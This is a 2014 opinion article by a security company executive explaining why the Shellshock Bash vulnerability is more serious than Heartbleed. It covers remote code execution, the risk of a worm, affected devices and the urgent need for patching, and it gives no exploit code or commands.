Skip to Content

Why the Shellshock Bug Is Worse than Heartbleed

We still don’t know how many systems are vulnerable to the Shellshock bug, but it is likely in the millions.
September 30, 2014

Last Wednesday a serious software vulnerability called Shellshock was reported; the bug could be exploited to compromise millions of servers and other devices worldwide. We still don’t know how wide and costly the problem will be, but we already know that Shellshock is more serious than the Heartbleed vulnerability that received wide attention back in April.

Heartbleed affected software used by servers to encrypt and secure communications. The flaw allowed attackers to get sensitive information such as encryption keys or passwords from vulnerable servers that could be used to secretly access the system later, for example to steal personal data.

Shellshock allows an attacker much more power. They can use it to take complete control of a system even without having a username and password. Exploitation of the vulnerability is simple and doesn’t require advanced skills.

Because an attacker can use Shellshock to remotely execute any code on a system, it could be used to create a self-replicating “worm.” It would use one compromised system to attack other systems, and so on, propagating over the network and compromising hundreds or thousands of system in little time.

The Shellshock vulnerability was found in a software package called Bash, a command line interpreter, or shell, that provides a powerful, flexible way to run commands on a computer. It is the default for all Linux-based operating systems and Apple’s Mac OS X. Bash is also widely used on simple Internet connected devices, many of which run versions of Linux, meaning that not only servers could be compromised but also some home routers, IP cameras, etc.

Some popular networking devices widely used by corporations have already been identified as vulnerable. Mobile devices are not at risk, unless you have modified your Apple or Android device to gain more control over its software.

Shellshock is dangerous because while Bash is not directly exposed to the Internet, some software that is can make use of Bash internally. For example, the “DHCP” software that negotiates your connection to a Wi-Fi network can pass along commands to Bash. This means that someone with a vulnerable operating system (mostly Linux) could be attacked when connecting to an untrusted Wi-Fi. (It’s worth noting that connecting to untrusted Wi-Fi networks is always a risk.)

Within a day of Shellshock being reported, there was evidence that it was being used to stage attacks “in the wild.” Information security departments at all companies and organizations should take preventive actions such as applying security fixes and close monitoring of internal networks. The United States Computer Emergency Readiness Team has issued an alert, and along with other security organizations worldwide is recommending users and system administrators apply security fixes as soon as possible.

However, it’s still too early to come up with an exhaustive list of affected devices that need updating. And although researchers and device vendors are publishing details about which devices are vulnerable and which aren’t, for some devices in use, no one will be checking because they are no longer supported, or documentation is lacking.

The faster systems are identified and patched, the lower the number of security compromises—and financial losses—that will be caused by Shellshock. It’s possible the economic effects of this bug will be severe because one compromised system can affect a lot of people. For instance, a compromised e-commerce site could not only cause lost sales due to downtime needed to patch, but also expose millions of credit card details, inconveniencing consumers.

Cesar Cerrudo is the chief technology officer at the computer security company IOActive Labs.

Keep Reading

Most Popular

Large language models can do jaw-dropping things. But nobody knows exactly why.

And that's a problem. Figuring it out is one of the biggest scientific puzzles of our time and a crucial step towards controlling more powerful future models.

OpenAI teases an amazing new generative video model called Sora

The firm is sharing Sora with a small group of safety testers but the rest of us will have to wait to learn more.

Google’s Gemini is now in everything. Here’s how you can try it out.

Gmail, Docs, and more will now come with Gemini baked in. But Europeans will have to wait before they can download the app.

This baby with a head camera helped teach an AI how kids learn language

A neural network trained on the experiences of a single young child managed to learn one of the core components of language: how to match words to the objects they represent.

Stay connected

Illustration by Rose Wong

Get the latest updates from
MIT Technology Review

Discover special offers, top stories, upcoming events, and more.

Thank you for submitting your email!

Explore more newsletters

It looks like something went wrong.

We’re having trouble saving your preferences. Try refreshing this page and updating them one more time. If you continue to get this message, reach out to us at customer-service@technologyreview.com with a list of newsletters you’d like to receive.